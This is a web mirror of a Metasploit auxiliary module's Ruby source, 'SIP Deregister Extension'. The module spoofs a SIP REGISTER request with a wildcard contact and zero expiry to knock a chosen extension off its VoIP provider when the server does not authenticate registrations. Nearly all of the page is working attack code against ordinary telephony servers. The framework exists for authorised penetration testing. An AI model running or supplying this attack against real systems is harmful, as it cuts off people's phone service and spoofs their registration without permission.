Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/voip/sip_deregister.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Udp
8
include Msf::Auxiliary::Scanner
9
10
def initialize
11
super(
12
'Name' => 'SIP Deregister Extension',
13
'Description' => %q{
14
This module will attempt to deregister a SIP user from the provider. It
15
has been tested successfully when the sip provider/server doesn't use REGISTER
16
authentication.
17
},
18
'Author' => [ 'ChrisJohnRiley' ],
19
'License' => MSF_LICENSE,
20
'Notes' => {
21
'Stability' => [SERVICE_RESOURCE_LOSS],
22
'SideEffects' => [IOC_IN_LOGS],
23
'Reliability' => []
24
}
25
)
26
27
deregister_udp_options
28
register_options(
29
[
30
Opt::RPORT(5060),
31
OptString.new('SRCADDR', [true, 'The sip address the spoofed deregister request is coming from', '192.168.1.1']),
32
OptString.new('EXTENSION', [true, 'The specific extension or name to target', '100']),
33
OptString.new('DOMAIN', [true, 'Use a specific SIP domain', 'example.com'])
34
]
35
)
36
register_advanced_options(
37
[
38
OptAddress.new('SIP_PROXY_NAME', [false, 'Use a specific SIP proxy', nil]),
39
OptPort.new('SIP_PROXY_PORT', [false, 'SIP Proxy port to use', 5060])
40
]
41
)
42
end
43
44
def setup
45
# throw argument error if extension or domain contain spaces
46
if datastore['EXTENSION'].match(/\s/)
47
raise ArgumentError, 'EXTENSION cannot contain spaces'
48
elsif datastore['DOMAIN'].match(/\s/)
49
raise ArgumentError, 'DOMAIN cannot contain spaces'
50
end
51
end
52
53
def run_host(ip)
54
src = datastore['SRCADDR']
55
ext = datastore['EXTENSION']
56
dom = datastore['DOMAIN']
57
sphost = datastore['SIP_PROXY_NAME']
58
spport = datastore['SIP_PROXY_PORT'] || 5060
59
conn_string = "#{ext}@#{dom}"
60
61
# set Route header if SIP_PROXY is set
62
if !sphost.nil? && !sphost.empty?
63
route = "Route: <sip:#{sphost}:#{spport};lr>\r\n"
64
end
65
66
connect_udp
67
68
print_status("Sending deregistration packet to: #{conn_string}")
69
print_status("Using SIP proxy #{sphost}:#{spport}") if route
70
71
req = "REGISTER sip:#{dom} SIP/2.0" + "\r\n"
72
req << route if route
73
req << "Via: SIP/2.0/UDP #{src}" + "\r\n"
74
req << 'Max-Forwards: 70' + "\r\n"
75
req << "To: \"#{ext}\"<sip:#{conn_string}>" + "\r\n"
76
req << "From: \"#{ext}\"<sip:#{conn_string}>" + "\r\n"
77
req << "Call-ID: #{rand(100..199)}#{ip}" + "\r\n"
78
req << 'CSeq: 1 REGISTER' + "\r\n"
79
req << 'Contact: *' + "\r\n"
80
req << 'Expires: 0' + "\r\n"
81
req << 'Content-Length: 0' + "\r\n\r\n"
82
83
udp_sock.put(req)
84
response = false
85
86
while ((r = udp_sock.recvfrom(65535, 3))) && r[1]
87
response = parse_reply(r)
88
end
89
90
# print error information if no response has been received
91
# may be expected if spoofing the SRCADDR
92
print_error('No response received from remote host') if !response
93
rescue Errno::EACCES => e
94
vprint_error(e.message)
95
ensure
96
disconnect_udp
97
end
98
99
def parse_reply(pkt)
100
# parse response to check if the ext was successfully de-registered
101
102
if (pkt[1] =~ /^::ffff:/)
103
pkt[1] = pkt[1].sub(/^::ffff:/, '')
104
end
105
106
resp = pkt[0].split(/\s+/)[1]
107
_rhost = pkt[1]
108
_rport = pkt[2]
109
110
if (pkt[0] =~ /^To:\s*(.*)$/i)
111
testn = ::Regexp.last_match(1).strip.to_s.split(';')[0]
112
end
113
114
case resp.to_i
115
when 401
116
print_error("Unable to de-register #{testn} [401 Unauthorised]")
117
when 403
118
print_error("Unable to de-register #{testn} [403 Forbidden]")
119
when 200
120
print_good("#{testn} de-registered [200 OK]")
121
else
122
print_error("#{testn} : Undefined error code #{resp.to_i}")
123
end
124
125
return true # set response to true
126
end
127
end
128
129